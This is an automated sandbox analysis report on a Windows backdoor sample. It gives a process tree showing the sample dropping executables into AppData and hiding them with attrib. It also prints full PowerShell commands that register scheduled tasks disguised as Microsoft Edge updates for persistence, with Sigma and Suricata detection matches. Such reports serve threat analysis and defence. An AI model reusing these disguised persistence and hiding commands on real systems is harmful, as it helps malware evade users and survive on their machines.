Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T1#U52a9#U624b1.0.1.exe

Overview

General Information

Sample name:T1#U52a9#U624b1.0.1.exe
renamed because original name is a hash value
Original sample name:T11.0.1.exe
Analysis ID:1581935
MD5:477d3b9ee775c048f96b450dd00ba490
SHA1:81f1991882b1bf1cb4b169da6c94b772517ab1eb
SHA256:799084320848500fef5673799157b94c1db7b74f9651ffe0af326051973cf490
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Suspicious powershell command line found
Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)
Uses Register-ScheduledTask to add task schedules
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Form action URLs do not match main URL
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • T1#U52a9#U624b1.0.1.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe" MD5: 477D3B9EE775C048F96B450DD00BA490)
    • T1#U52a9#U624b1.0.1.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe" MD5: 477D3B9EE775C048F96B450DD00BA490)
      • powershell.exe (PID: 7404 cmdline: powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7544 cmdline: powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../WinHex.exe'; $Trigger = New-ScheduledTaskTrigger -AtLogon; $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnceMe' -Description 'MicrosoftEdgeUpdatesOnce once You' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnceMe' " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7560 cmdline: C:\Windows\system32\cmd.exe /c "attrib +s +a +h C:\Users\user\AppData\LineInst.exe&&attrib +s +a +h C:\Users\user\AppData\WinHex.exe&&attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 7668 cmdline: attrib +s +a +h C:\Users\user\AppData\LineInst.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • attrib.exe (PID: 7704 cmdline: attrib +s +a +h C:\Users\user\AppData\WinHex.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • attrib.exe (PID: 7728 cmdline: attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • LineInst.exe (PID: 7804 cmdline: C:\Users\user\AppData\Roaming\../LineInst.exe MD5: AA2AD37BB74C05A49417E3D2F1BD89CE)
    • SetupHost.exe (PID: 7892 cmdline: "C:\$Windows.~WS\Sources\SetupHost.Exe" /Download /Web MD5: A5D94F9587F97E9C674447447721B77F)
  • WinHex.exe (PID: 7812 cmdline: C:\Users\user\AppData\Roaming\../WinHex.exe MD5: EFDC5DBA52333C0F5EEEDB0308FBE2D0)
    • WinHex.exe (PID: 7968 cmdline: C:\Users\user\AppData\Roaming\../WinHex.exe MD5: EFDC5DBA52333C0F5EEEDB0308FBE2D0)
      • cmd.exe (PID: 8028 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\SystemUpdate.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • SystemUpdate.exe (PID: 8072 cmdline: C:\Users\user\AppData\SystemUpdate.exe MD5: 6BDDA8BA15F8F472FE7D065689E7D35D)
          • SystemUpdate.exe (PID: 8124 cmdline: C:\Users\user\AppData\SystemUpdate.exe MD5: 6BDDA8BA15F8F472FE7D065689E7D35D)
            • cmd.exe (PID: 8164 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 5696 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 2180 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 3604 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7324 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7572 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 6544 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7732 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7340 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 4584 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7372 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 4948 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 1016 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 3912 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7952 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7504 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 1076 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 652 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 1016 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 5744 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 2300 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7008 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 480 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7336 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 4924 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 4956 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7840 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 8008 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 6264 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 6688 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 4004 cmdline: C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 8024 cmdline: schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • vdsldr.exe (PID: 7932 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: 472A05A6ADC167E9E5D2328AD98E3067)
  • chrome.exe (PID: 7440 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2004,i,6640444533988444684,5159300963362034494,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 7752 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrome.exe (PID: 5292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,4545882299053764737,12810531249114103037,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2012,i,6542869062695771062,17740834492215068834,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 7120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,3791569026057449520,15559375112028835645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 3736 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,6770807407451840845,2731558754491331151,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 5300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=532930 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1992,i,293139969124192718,13583878474494082115,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1988,i,4903166560758941508,11037472114900692945,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 7576 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1476 --field-trial-handle=2056,i,15588339443550297223,13273642016281484051,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe, ProcessId: 7348, TargetFilename: C:\Users\user\AppData\LineInst.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' ", CommandLine: powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe", ParentImage: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe, ParentProcessId: 7348, ParentProcessName: T1#U52a9#U624b1.0.1.exe, ProcessCommandLine: powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' ", ProcessId: 7404, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7752, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-29T13:40:37.759404+010020528751A Network Trojan was detected192.168.2.4499058.212.101.1951122TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: T1#U52a9#U624b1.0.1.exeVirustotal: Detection: 14%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0052C0E8 __allrem,SetLastError,BCryptHashData,GetLastError,SetLastError,13_2_0052C0E8
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051C3FB BCryptOpenAlgorithmProvider,BCryptCloseAlgorithmProvider,13_2_0051C3FB
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051C3BE BCryptFinishHash,BCryptDestroyHash,LocalFree,13_2_0051C3BE
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051C464 BCryptGetProperty,LocalAlloc,13_2_0051C464
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051C4D7 BCryptCreateHash,13_2_0051C4D7
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00528A9A GetFileSizeEx,GetLastError,GetLastError,GetLastError,GetLastError,BCryptHashData,memcpy,GetLastError,GetLastError,BCryptDestroyHash,LocalFree,13_2_00528A9A
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00523F26 BCryptOpenAlgorithmProvider,BCryptGetProperty,GetProcessHeap,HeapAlloc,BCryptCreateHash,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,RtlNtStatusToDosError,SetLastError,13_2_00523F26
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Form action: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c13cb6fd407&redirect_uri=https%3A%2F%2Fsupport.microsoft.com%2Fsignin-oidc&response_type=code%20id_token&scope=openid%20profile%20offline_access&response_mode=form_post&nonce=638710728445268300.MWViZDllNTYtN2RlYy00YmIwLTlkMDYtNmRkZmZjMTZjMDVhOTljNGQ3ZDItYWVmOS00MTdiLTk3OTgtZTU1ZWM4ZTJjZDU5&prompt=none&nopa=2&state=CfDJ8C0ohqf0LPdLoRrMGwogAww3w_ArYnAktjChoLvpylRtQBzDFmbj0GP9oLu3BgsJz_XZaw-IAWKK0mIdbF2l7lIf_FEpybZ2HjEAbeeCxcqaLpr29R3Fh9Fi41r87lNM4oid3W3COo3U2EUI4ExH4iuPH8rWTXSx4wfOxfu6AITKsbEV4O0vuQUxYPi_7SE8pBB5OFOhdNyhj478IW-ANfoDZRuysfCGt6o5o1VxJGKQHmg8AJnb7bk-szT8Ao1IZ3P6ja4k6qyK55uRO0PCwhqy5CkYnoy2HQPlpjCUid8ubgzUTCTlu5MstlHq7ibWw2y2B_dpWbs1jAKUbLBW1A0PY8EJQM9_-bCTi9hGakzy&x-client-SKU=ID_NET6_0&x-client-ver=8.1.2.0&sso_reload=true microsoft microsoftonline
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Form action: 